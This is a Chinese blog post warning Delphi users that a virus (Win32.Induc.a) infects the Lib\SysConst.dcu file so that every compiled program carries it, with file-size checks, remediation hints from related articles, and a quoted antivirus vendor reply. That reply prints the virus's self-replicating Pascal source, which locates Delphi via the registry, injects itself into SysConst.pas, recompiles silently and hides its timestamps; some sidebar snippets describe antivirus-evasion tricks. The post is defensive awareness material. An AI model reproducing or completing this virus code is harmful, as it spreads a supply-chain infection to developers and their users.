Delphi编译的程序如果被杀毒软件误杀,请注意Delphi安装目录Lib下的SysConst.dcu,可能已被病毒感染

最新推荐文章于 2020-05-31 17:20:14 发布
最新推荐文章于 2020-05-31 17:20:14 发布
阅读量3.1k 收藏
点赞数
分类专栏: .Net 文章标签: delphi 杀毒软件 string function windows c#
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/i_mimi/article/details/4478603
版权

    注意检查下delphi安装目录lib下的SysConst.dcu文件,如果大小为17KB,就是被感染了,正常大小在12KB,编译出来的程序都会被报病毒。目前杀毒软件大都检测到。

 

以下是卡巴工程师的回答:

尊敬的用户,您好!

      
我们最新截获了一种病毒Virus.Win32.Induc.a,此病毒会向您现有的delphi工程中添加病毒文件并修改工程配置文件,使得编译时将病毒一同编译。编译后的二进制文件中可以找到以下ASCII代码:

uses windows;

var sc:array[1..24] of string=('uses windows; var sc:array[1..24] of  
string=(',
'function x(s:string):string;var i:integer;begin for i:=1 to  
length(s) do if s',
'=#36 then s:=#39;result:=s;end;procedure re(s,d,e:string);var  
f1,f2:textfile;',
'h:cardinal
;f:STARTUPINFO
;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin',
'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then  
begin CloseHandle',
'(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then  
exit;assignfile',
'(f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin  
closefile(f1);exit;end; while',
'not eof(f1) do begin readln(f1,s); writeln(f2,s);  if  
pos($implementation$,s)<>0',
'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23  
do writeln(f2',
',$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24  
do writeln(f2,',
'x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu
$),pchar(d+$bak$',
')); fillchar(f,sizeof(f),0); f.cb:=sizeof(f);  
f.dwFlags:=STARTF_USESHOWWINDOW;f.',
'wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$),
0,0,false,0,0,0,',
'f,p);if b then  
WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),',
'pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+
$bak$),0,0,0,3,',
'0,0);  if  h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3);  
CloseHandle(h);h:=',
'CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);if h=DWORD(-1) then  
exit;SetFileTime(h,',
'@t1,@t2,@t3); CloseHandle(h); end; procedure st; var   
k:HKEY;c:array [1..255] of',
'char;  i:cardinal; r:string; v:char; begin for v:=$4$ to $7$ do if  
RegOpenKeyEx(',
'HKEY_LOCAL_MACHINE,pchar($Software/Borland/Delphi/$+v+$.0$),
0,KEY_READ,k)=0 then',
'begin i:=255;if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then  
begin r:=$$;i:=',
'1; while c<>#0 do begin r:=r+c;inc(i);end;re(r+$/source/rtl
/sys/SysConst$+',
'$.pas$,r+$/lib/sysconst.$,$"$+r+$/bin/dcc32.exe"  
$);end;RegCloseKey(k);end; end;',
'begin st; end.');

function x(s:string):string;
var
  i:integer;
  begin
for i:=1 to length(s) do
等等

米的向日葵
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
delphi编译产生的病毒问题
09-01
如果DELPHI安装目录里的Lib\SysConst.dcu文件大小大于或等于 17K,说明已经中招了。解决方法是,找到lib\下的sysconst.bak文件,删除SysConst.dcu文件,并将SysConst.bak文件改名为SysConst.dcuDelphi编译文件...
delphi 6-7 sysconst.pas
11-30
对于防范如“Delphi恶作剧病毒”之类的恶意代码,备份sysconst.pas源码也是保护系统安全的一种措施,因为源码备份可以确保在遭受攻击时恢复到原始状态,降低程序受损的风险。因此,了解并掌握sysconst.pas对于每个...
[严重警惕]感染delphi编译器的SysConst.dcu病毒
weixin_30917213的博客
08-24 276
大家检查下delphi安装目录lib下的SysConst.dcu文件,大小如果为17KB左右,则是被感染了。SysConst.dcu正式大小应该为12KB不到。如不解决,将导致Delphi编译出的所有程序都带有病毒...目前我发现的是D6 D7都被感染,而且潜伏期超过3-5个月..也就是说我这3-5个月中编译程序都带有这个病毒...T_T无意间成了病毒传播的帮凶了.其他版本的Delphi自检...
Delphi 编译出来的程序被小红伞报病毒 TR/Spy.Banker.Gen4 [trojan]
weixin_30815427的博客
09-02 246
今天碰到非常奇怪的问题,正常开发的单元代码,在A程序编译出来没有问题,将相同的单元引用到B程序编译出来就被小红伞报病毒TR/Spy.Banker.Gen4 [trojan],自动隔离删除。 今时今日的防病毒软件,实在是让人纠结不已,今天一个下午的排查代码,最后发现问题居然是出现在调用Windows API的地方,总体有两处代码会出现报病毒: 问题代码1: //单元...
Delphi编译出来的程序报病毒了
weixin_30640769的博客
01-09 844
这两天在写一个小程序时,突然编译出来的程序运行后报 Students.exe Win32/Induc.A 病毒 的变种 我晕的,然后我在国外的网站也看到有这样的报道,现在这种病毒只影响delphi 5、6、7,具体的解决方法有: 1、升级最新的病毒库 2、在delphi/lib目录下找找看有没有sysconst.bak的文件,如果有说明已经中毒,把sysconst.bak恢复成sysc...
今天发现Delphi编译出来的程序报病毒了。
wangyunyong0905的专栏
08-20 2032
这两天在写一个小程序时,突然编译出来的程序运行后报 Students.exe    Win32/Induc.A 病毒 的变种  我晕的,然后我在国外的网站也看到有这样的报道,现在这种病毒只影响delphi 5、6、7,具体的解决方法有:1、升级最新的病毒库2、在delphi/lib目录下找找看有没有sysconst.bak的文件,如果有说明已经中毒,把sysconst.bak恢复成sy
[转帖]发现感染DELPHI的病毒
weixin_30732825的博客
08-19 159
DELPHI盒子与DELPHI群里看到的,据说只感染DELPHI7以下的版本(包含DELPHI7),貌似N多人中招了。感染此病毒后,所有用DELPHI编译程序全都有感染能力。如果在 C:\Program Files\Borland\Delphi7\Lib 发现有 SysConst.bak (12KB) 和SysConst.dcu (18KB),那么恭喜你,中招了。该病毒没有exe或者dll的...
delphi2007字符串资源汉化
02-18
4. `SysConst.dcu`:系统常量,可能包含操作系统相关的字符串资源。 5. `SqlConst.dcu`:SQL相关的常量,如果程序涉及数据库操作,这里可能有数据库错误消息或查询相关的字符串。 6. `DBConsts.dcu`:数据库常量,与...
sysconst2020.2:计算许可证的材料数据库2020.2
02-11
顶部导航栏为黑色 :black_heart: 最新的依赖关系入门要使用此模板,选择以下选项之一以开始使用: 从GitHub下载最新版本的ZIP文件从GitHub克隆此存储库使用安装作曲家安装如果您的系统上没有 ,它。 要安装模板...
sysconst病毒的Filemon分析文件
08-28
分析文件,可以用Filemon打开,建议用Filemon查看,比较直观易懂
ezService分布式应用快速开发工具
03-16
* ezService一直在更新中。...- SysConst 具备更强大的扩展能力。 更多内容,访问作者主页:http://www.ezService.org 目前主页新增了论坛系统,欢迎访问留言: http://www.ezService.org/dvbbs
C#使用Window API创建任务栏托盘图标弹出式菜单
01-08
this.Text = this.notifyIcon.Text = new ConfigFileUtil().DataTableInfo_TableName + "-" + SysConst.App_Name_ZN; SetupSystemMenu(); } ``` - `InitializeComponent()`:初始化窗体控件。 - 设置`this.Text`和...
delphi编程实现免杀捆绑
期待下集是个可爱梦儿
03-22 753
用过了各种各样的捆绑机,无一例外都被俺的卡巴杀出来了,即使一个好的捆绑器短时间不被杀,时间一长照样又被揪出来了,现在免费而且免杀的捆绑机就是rar了,他经过换图标确实能达到很好的效果,但是右键一看,里面多了一个"用rar打开"就露馅了。俺在学delphi资源的时候想到用释放资源的方法不是可以实现捆绑吗?经过试验,效果很好,不会检测到任何附加数据和2个文件头之类的现象,唯一能看到的就是exescope里会看到资源里多了一个exefile,不过经过fsg一加密就看不到里面的内容了,而且即使高手一般也不会麻烦到每
delphi7 编译程序时报win32.indcu.a病毒的解决方法
weixin_33998125的博客
01-19 201
Delphi7用了很久一直都没问题,同一个工程文件昨天编译时mod32还不会报毒,今天重新编译时,生成的exe突然nod32报毒。 提示:   “Project1.exe Win32/Induc.A 病毒 的变种 已删除 - 已隔离 NT AUTHORITY\SYSTEM 在应用程序新建的文件上发生事件: C:\Program Files\Delphi7SE\Bin\delphi32.exe.”...
文件占坑,逃过360等垃圾软件的查杀。
08-08 288
原理是以独占的方式打开文件,再把文件句柄复制到另一个程序中去,达到本程序退出后目标文件仍被打开的目的这是delphi代码:program createfile;uses Windows, SysUtils;//提权函数procedure SetPrivilege;var TPPrev, TP: TTokenPrivileges; TokenHandle:
最新版本启动HBuilderX.exe时,被联想mcafee杀毒软件删除的解决方法
一火的专栏
05-31 1800
最新版本启动HBuilderX.exe时,被联想mcafee杀毒软件删除的解决方法。 1.HBuilderX.exe添加到信任区 2.找回被删除的HBuilderX.exe文件
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值